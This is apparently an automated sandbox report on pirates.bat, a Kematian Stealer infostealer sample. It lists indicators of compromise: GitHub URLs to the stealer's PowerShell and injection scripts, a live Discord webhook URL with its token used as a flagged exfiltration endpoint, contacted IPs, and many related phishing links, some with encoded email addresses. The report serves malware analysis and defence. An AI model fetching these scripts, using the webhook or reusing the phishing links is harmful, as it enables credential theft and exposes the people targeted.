Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://go.micro
Source: powershell.exe, 00000014.00000002.1765711117.000001EC47B46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1
Source: powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://contoso.com/Icon
Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://raw.githubusercont
Source: powershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://www.microsoft.
Source: powershell.exe, 00000024.00000002.1956228597.0000029E526AB000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 2%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C0000B6000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://www.cloudflare.com
Source: powershell.exe, 00000028.00000002.2928167979.0000017EE82E5000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://github.com/Pester/Pester
Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834
Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: http://crl.mh
Source: powershell.exe, 00000028.00000002.2916812846.0000017E8045A000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://github.com/TheWover
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx
Source: powershell.exe, 00000014.00000002.1765375407.000001EC44F5E000.00000004.00000020.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/kematian_shellcode.ps1
Source: powershell.exe, 00000030.00000002.2354204002.000002A858DB6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
Source: powershell.exe, 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://objects.githubusercontent.com
Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://raw.githubusercontent.com
Source: powershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC46ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFC0000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://raw.githubusercontent.com
Source: powershell.exe, 00000014.00000002.1765711117.000001EC48293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFD8000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://aka.ms/pscore68
Source: powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0272A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0273D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://github.com/Somali-Devs/Kematian-Stealer
Source: powershell.exe, 00000028.00000002.2928167979.0000017EE866A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EEA035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE97DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE8E37000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://oneget.org
Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvx
Source: powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | true
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
104.16.123.96 | www.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
185.199.111.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467953
Start date and time: 2024-07-05 06:25:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 50
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: pirates.bat
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winBAT@69/65@7/5
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 21
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .bat
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7624 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8132 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtNotifyChangeKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:26:04 | API Interceptor | 1247500x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Nuevo orden.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Ship Docs_CI PL HBL COO_.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SOA Payment for June 30th.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | bL1WCnC18s.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | A1YOFV1abV.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | main.ps1 | malicious | Unknown | ip-api.com/json
208.95.112.1 | main.ps1 | malicious | Unknown | ip-api.com/json
208.95.112.1 | Orden.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 20240704-455.exe | malicious | GuLoader | ip-api.com/line/?fields=hosting
140.82.121.3 | 6glRBXzk6i.exe | malicious | RedLine | github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
140.82.121.3 | firefox.lnk | malicious | CobaltStrike | github.com/john-xor/temp/blob/main/index.html?raw=true
140.82.121.3 | 0XzeMRyE1e.exe | malicious | Amadey, Vidar | github.com/neiqops/ajajaj/raw/main/file_22613.exe
140.82.121.3 | MzRn1YNrbz.exe | malicious | Vidar | github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
140.82.121.3 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
185.199.110.133 | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ== | malicious | HTMLPhisher | (none)
185.199.110.133 | thegreatestexecutor.bat | malicious | Unknown | (none)
185.199.110.133 | thegreatestexecutor.bat | malicious | Unknown | (none)
185.199.110.133 | https://maknastudio.com/pkyos | malicious | HTMLPhisher | (none)
185.199.110.133 | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | (none)
185.199.110.133 | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | (none)
185.199.110.133 | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | (none)
185.199.110.133 | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CuPML-2Fk7hkFuRgQZCNn13gFjxpvaK7BszvLf1FNgQSAGEcVOyFo5OkKyCTWVX8CFkHH2058S5Ahgs6702chswQ27i8fTIQhwmMoXYoEJ6NorF1VpAe0oJx35gDOEfSC0fALEr8V3cxNwqqHdyN8bubmjrpvt-2BbFbnZ-2FstXl8vxTAGFM6mTwmzfEL-2B-2BGu2lufzB8M21afC0TTeqSa7QFFyNA-3D-3DHBPv_PfC-2BSFtj-2BSSQFBPv0NgAOXDpcsq6LADHKWdyLdLAzrKwVahhFR76hhions4TwBL9F6a4eQ738jeLIeY9r1OOXohTZTeZE0n2g2t6fycMpA0TJOA8sXK8mZcOXs-2BnNqbr4W7O00eI9WZrnuIrYT3RIDO-2BEHvZtO2YjJnjDLiBUb-2B7QOSPTNUmcSEPbCN9-2Bq0u5dYWTd9AfzNX553r2GVUOxBO0VYIry3r2htr0J03Czo-3D | malicious | HTMLPhisher | (none)
185.199.110.133 | https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih | malicious | HTMLPhisher | (none)
185.199.110.133 | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDefjjvAc1VCRhzhBKQTVpjzhejQ8Rhu1zO1vWGAUfUeULJrKwFSbIOyWIUfIv-2Flo3yTYESP-2B78w2V31KWz3gTVG4x9fJGaMxyv5FQX0-2FC02SNh0q62WGV8moxgoMPN13ug-3D-3D0M2T_RK3E7lcHJh6RzNRog0V2Ww4F1i1LQS7pYYmvozE9BtFWFH8CBc2C7lCJRjsdH3VwNbJDjo91Q5gKMT9cCcdXw8AkweIV-2FNLnytbk6yO5x98zOjWQvldOWLzS2kOJk-2Bc9a9xwBmgqVDiuxw1Lx4HAzZ-2Bjhc2IjRsVwgsa2WyKs6mVKScqAKEYCpz9uhwD3RMPm3P4ijESTEtLH2hoAVbwO9XnUT-2BT6XJFuujR9hf41ZQ-3D | malicious | HTMLPhisher | (none)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | main.ps1 | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | main.ps1 | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | thegreatestexecutor.bat | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | thegreatestexecutor.bat | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | https://ns43q4.csb.app/ | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | Roblox Account Manager.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | Roblox Account Manager.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 | malicious | Unknown | 185.199.109.133
ip-api.com | Nuevo orden.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | Ship Docs_CI PL HBL COO_.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | SOA Payment for June 30th.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | bL1WCnC18s.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | A1YOFV1abV.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | main.ps1 | malicious | Unknown | 208.95.112.1
ip-api.com | main.ps1 | malicious | Unknown | 208.95.112.1
ip-api.com | Orden.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | 20240704-455.exe | malicious | GuLoader | 208.95.112.1
github.com | SecuriteInfo.com.FileRepMalware.1111.23697.exe | malicious | Unknown | 140.82.121.3
github.com | https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6 | malicious | HTMLPhisher | 140.82.121.4
github.com | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ== | malicious | HTMLPhisher | 140.82.121.3
github.com | http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com | malicious | HTMLPhisher | 140.82.121.4
github.com | SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe | malicious | RUSTDESK | 140.82.121.3
github.com | main.ps1 | malicious | Unknown | 140.82.114.4
github.com | SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe | malicious | RUSTDESK | 140.82.121.4
github.com | kematian_shellcode.ps1 | malicious | Unknown | 140.82.121.3
github.com | main.ps1 | malicious | Unknown | 140.82.121.3
github.com | update23.bat | malicious | Braodo | 140.82.121.4
www.cloudflare.com | main.ps1 | malicious | Unknown | 104.16.123.96
www.cloudflare.com | https://cdoiq2024.org/events/session-13-e/ | malicious | Unknown | 104.16.123.96
www.cloudflare.com | main.ps1 | malicious | Unknown | 104.16.123.96
www.cloudflare.com | thegreatestexecutor.bat | malicious | Unknown | 104.16.123.96
www.cloudflare.com | thegreatestexecutor.bat | malicious | Unknown | 104.16.123.96
www.cloudflare.com | fart.exe | malicious | AsyncRAT, DcRat, Quasar, XWorm | 104.16.123.96
www.cloudflare.com | https://bafybeicl3sruyvjs6is67yed47chltq63n7qdv67sjo4yupnqu6bmy5uka.ipfs.dweb.link/ | malicious | Unknown | 104.16.123.96
www.cloudflare.com | http://104.21.19.145 | malicious | Unknown | 104.16.124.96
www.cloudflare.com | http://telegravm.work/ | malicious | Telegram Phisher | 104.16.124.96
www.cloudflare.com | http://telegrram.work/ | malicious | Telegram Phisher | 104.16.123.96
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU= | malicious | HTMLPhisher | 151.101.130.137
FASTLYUS | https://metamesklogni.webflow.io/ | malicious | Unknown | 151.101.2.188
FASTLYUS | http://cacahs.fdavm.com/ | malicious | Unknown | 151.101.65.229
FASTLYUS | http://mysterymint-s10.vercel.app/ | malicious | Unknown | 185.199.109.133
FASTLYUS | https://metaioseklcogin.webflow.io/ | malicious | Unknown | 151.101.2.188
FASTLYUS | https://pub-fb608504b57048a1b1ca54c74dbf132d.r2.dev/ront.html?ccsend | malicious | HTMLPhisher | 199.232.192.193
FASTLYUS | http://diffusion-florentine-facilitated.netlify.app/form.html | malicious | Unknown | 151.101.129.229
FASTLYUS | https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/ | malicious | Unknown | 151.101.65.229
FASTLYUS | https://www.google.com/url?q=https://authitca-adobue-sign.us-ord-1.linodeobjects.com/apts.html&sa=D&source=editors&ust=1720118061448441&usg=AOvVaw1WUHTIwDQHQCe4Um2Fp0tG | malicious | HTMLPhisher | 151.101.130.137
FASTLYUS | xJwSq336bs.pdf | malicious | Unknown | 151.101.66.137
TUT-ASUS | Nuevo orden.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Ship Docs_CI PL HBL COO_.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | SOA Payment for June 30th.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | bL1WCnC18s.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | A1YOFV1abV.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | main.ps1 | malicious | Unknown | 208.95.112.1
TUT-ASUS | main.ps1 | malicious | Unknown | 208.95.112.1
TUT-ASUS | Orden.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 20240704-455.exe | malicious | GuLoader | 208.95.112.1
GITHUBUS | SecuriteInfo.com.FileRepMalware.1111.23697.exe | malicious | Unknown | 140.82.121.3
GITHUBUS | https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6 | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ== | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe | malicious | RUSTDESK | 140.82.121.3
GITHUBUS | main.ps1 | malicious | Unknown | 140.82.114.4
GITHUBUS | SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exe | malicious | RUSTDESK | 140.82.121.4
GITHUBUS | kematian_shellcode.ps1 | malicious | Unknown | 140.82.121.3
GITHUBUS | main.ps1 | malicious | Unknown | 140.82.121.3
GITHUBUS | update23.bat | malicious | Braodo | 140.82.121.4
CLOUDFLARENETUS | c2e57fb2b8206bd9b5d05d8a9b0d2e78082dd303ee6364b288d568fcd48900f7_dump.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
CLOUDFLARENETUS | 6xmBUtHylU.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | XX(1).exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
CLOUDFLARENETUS | OVER DUE INVOICE PAYMENT.docx | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU= | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | Ship Docs_CI PL HBL COO_.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | https://rb.gy/zsqpja | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | https://singingfiles.com/show.php?l=0&u=2156442&id=64574 | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/ | malicious | HTMLPhisher | 188.114.97.3
CLOUDFLARENETUS | http://services.business-manange.com/ | malicious | HTMLPhisher | 172.67.138.117
Match | Associated Sample Name / URL | Detection | Threat Name | Context
